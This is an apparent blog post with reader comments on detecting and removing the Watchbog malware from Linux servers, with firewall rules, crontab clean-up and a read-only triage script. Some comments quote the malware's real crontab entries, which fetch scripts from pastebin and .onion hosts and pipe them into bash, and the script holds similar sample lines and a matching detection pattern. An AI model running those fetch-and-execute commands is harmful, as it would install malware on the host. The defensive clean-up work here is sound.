Saturday, 10 November 2018

Blocking Watchbog Malware/Ransomware with IPTables on Linux

Block the IP with the following commands.

iptables -A INPUT -s 104.20.208.21 -j DROP

iptables -A OUTPUT -s 104.20.208.21 -j DROP

iptables -A OUTPUT -j DROP -d 104.20.208.21

Now save the newly added iptables configuration with the command below.

/sbin/service iptables save

Additionally, if no application on the host depends on them, you can uninstall the packages below.

wget
curl
python

If something does depend on them, rename the binaries instead, e.g.

#mv /usr/bin/curl /usr/bin/lruc

Do the same for 'wget' and 'python'.

Note that yum will not work while python is renamed or removed.

This is malware/ransomware. You must remove it from your system completely: both the process and the files.


It can run under any user, including root. First find the process called "watchbog".

You can find the owning username with "top" or in the output of this command:

ps aux | grep watchbog

Then kill the process with -9 using the commands below:

ps -ef | grep watchbog

kill -9 <PID>


Then look at the cron jobs of that user:

crontab -u username -l

If it contains an entry like this one (fetching a script from pastebin.com)

* * * * https://pastebin.com/

delete all of that user's cron entries with

crontab -r -u username

Then delete this file:

/usr/bin/watchbog


Then delete these folders:

/tmp/*timesyncc.service*
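The checks above (a running watchbog process, a crontab entry pulling a script from pastebin.com, the dropped files) collected into one read-only triage script so you can confirm an infection before cleaning up. This is an added example and not part of the original post; the function names triage_host, suspicious_cron_lines and watchbog_pids, the download-and-pipe-to-shell pattern, and the sample crontab and ps output (placeholder pastebin URLs and a TEST-NET address) are my own constructions, not captures from an infected host.

```shell
#!/bin/sh
# Added triage helper, not from the original post. It checks the indicators
# the post describes: a running "watchbog" process, crontab entries that fetch
# remote content and pipe it into a shell, and the dropped files. The checks
# are read-only; removal is left to the steps in the post.
# The text-processing functions take their input as an argument so they can
# be exercised offline on constructed samples; triage_host feeds them the
# live system.

# Print crontab lines that fetch remote content and pipe it into a shell.
# The pattern is an assumption based on the entries quoted in the post:
# either pastebin.com, or a curl/wget fetch piped into sh/bash.
suspicious_cron_lines() {
    printf '%s\n' "$1" \
      | grep -E 'pastebin\.com|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Print the PIDs of processes whose command is watchbog, from output in the
# layout of "ps -eo pcpu,pid,user,args" (the header line does not match).
watchbog_pids() {
    printf '%s\n' "$1" | awk '$4 ~ /(^|\/)watchbog$/ { print $2 }'
}

# Read-only check of the live host (needs root to read other users' crontabs).
# Returns 1 if any indicator was found so it can drive an alert or a cron job.
triage_host() {
    found=0
    pids=$(watchbog_pids "$(ps -eo pcpu,pid,user,args)")
    if [ -n "$pids" ]; then
        echo "watchbog running, PIDs: $pids"
        found=1
    fi
    for user in $(cut -d: -f1 /etc/passwd); do
        tab=$(crontab -u "$user" -l 2>/dev/null) || continue
        hits=$(suspicious_cron_lines "$tab") && {
            echo "suspicious crontab entries for $user:"
            echo "$hits"
            found=1
        }
    done
    # Paths named in the post; the glob stays literal when nothing matches.
    for f in /usr/bin/watchbog /tmp/*timesyncc.service*; do
        [ -e "$f" ] && { echo "malware artifact present: $f"; found=1; }
    done
    return $found
}

# Constructed sample inputs (not real captures) for offline verification.
# 203.0.113.10 is a TEST-NET address and the pastebin paths are placeholders.
SAMPLE_CRON='0 3 * * * /usr/local/bin/backup.sh
*/11 * * * * (curl -fsSL https://pastebin.com/raw/EXAMPLE||wget -q -O- https://pastebin.com/raw/EXAMPLE)|bash
*/5 * * * * curl -s http://203.0.113.10/mr.sh | bash -sh
30 6 * * 1 /usr/bin/certbot renew'

SAMPLE_PS='%CPU PID USER COMMAND
31.5 8128 root ./watchbog
 0.1 1234 root /usr/sbin/sshd -D
31.4 8140 solr /tmp/watchbog'

# Run "sh triage.sh --live" on the host to check the real system.
if [ "${1:-}" = "--live" ]; then
    triage_host || echo "indicators found; follow the removal steps above"
fi
```

Blocking a single IP only helps while that IP stays the same, so the crontab check is the more durable indicator: any entry that downloads from pastebin.com or pipes curl/wget output into a shell is reason enough to treat the host as compromised.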


20 comments:

  1. Greetings
    I have a recurring instance of this "watchbog" infection.
    I have taken steps to cripple it. However, I should like to ask you if you have any idea how it invades a server?

  2. I want to find out too, how I got infected!?

    my temporary fix is to run a loop inside a screen session to kill watchbog as it reappears.
    1) enter a new screen session by typing: screen
    2) grant sudo permissions by typing: sudo su
    3) write this oneliner: while true ; do killall watchbog ; done
    4) then press CTRL+A+D key combo, and the screen session will continue to run in the background, so the process gets killed instantly if it reappears.

  3. Hi Sudhakar,

    I followed all the steps except uninstalling curl and python. With no luck, the Watchbog process is reappearing.
    Looking at the temporary solution provided by one of the comments, I am killing watchbog inside a while loop but in a single screen session.

    $ while true ; do killall watchbog ; done

    And I am keeping session open in puTTY.
    Please update if you find any permanent fix.

    Thank you for the post.

  4. Also, blocking the IP address using iptables is not helping as the IP is getting changed every time I kill the process.

  5. OK, so we installed a fresh Ubuntu 18.04.1, with fresh webserver packages. Copied WWW and SQL data and IT'S BACK!!!, so probably this WATCHBOG virus infects the system through the web services, but that really sounds impossible.
    On the new server, port 22 is open only from certain IPs.
    Passwords are different than on the previous server. The only thing which got transferred is WWW-DATA and SQL.

    Replies
    1. It was probably in your www-data folder.

  6. I followed the above steps. But instead of iptables I used our cloud provider's external firewall to block internet access.
    After that I proceeded as you mentioned but the virus kept coming back.
    I then realized it downloaded scripts from pastebin.
    I pointed pastebin.com and gitee.com to localhost in /etc/hosts. After that it stopped.

    Replies
    1. "I pointed pastebin.com and gitee.com to localhost in /etc/hosts." This is the best idea!

      It gives me some time before re-installing !
      Thanks a lot !

    2. Thanks a lot! Now can focus on finding the cause of how it got in and re-installing.

    3. Thanks a lot, man. It worked, but one more thing. Sometimes they do use an IP to get the script, like
      curl -s http://107.174.47.156/mr.sh | bash -sh
      so it is better to remove curl and wget (if you do not need them).
      FYI this is a temp solution to buy time for fixing it permanently.

  7. Replies
    1. Thanks for forcing your affiliate link on the unsuspecting that might actually believe you have provided a possible solution to this issue. Go find a better way to make your cash please, sir!!

  8. I created a script. It seems to be a reasonable solution for those who haven't updated their web server software yet, or can't for some technical reason. I hope folks find it helpful.

    https://github.com/blackrangersoftware/kill4watchbog

  9. After many attempts at last this solution definitely worked for me!!! Thank you so much!

  10. I removed crontab access for the solr user and also deleted all tmp files.

  11. I found the watchbog virus in one of my Linux machines, and here is what I did step by step until I finally managed to kill the virus. The virus has a hidden process that creates a cronjob and uses up the CPU. This can be detected by the following command:

    ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10

    %CPU PID USER COMMAND
    31.5 8128 root ./watchbog
    31.5 8116 root ./watchbog
    31.4 8140 root ./watchbog
    So what to do? First, check the content of the crontab:

    crontab -l

    */11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
    ##
    */11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
    ##
    Thus, the virus is automatically creating the crontab. We can remove the crontab using the following command:

    crontab -r

    Then we can check if it is already empty using the following command:

    ls /var/spool/cron/crontabs

    If it has some content (e.g. root) then it means the new cron job was created.

    Since the virus is using curl, urllib2 or wget, we need to temporarily uninstall them:

    pip uninstall urllib2
    apt-get remove --auto-remove curl
    apt-get remove --auto-remove wget
    Then, we remove the cron job and then kill the process.

    crontab -r

    while true ; do killall watchbog ; done

    Let us see again if it works.

    crontab -l

    ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10

    There is no more watchbog.

    Then do not forget to change the password:

    sudo passwd root

    Kardi
    https://people.revoledu.com/kardi/tutorial/

  12. Hello there! I just want to offer you a big thumbs up for your great info you have right here on this post. I'll be coming back to your web site for more soon.
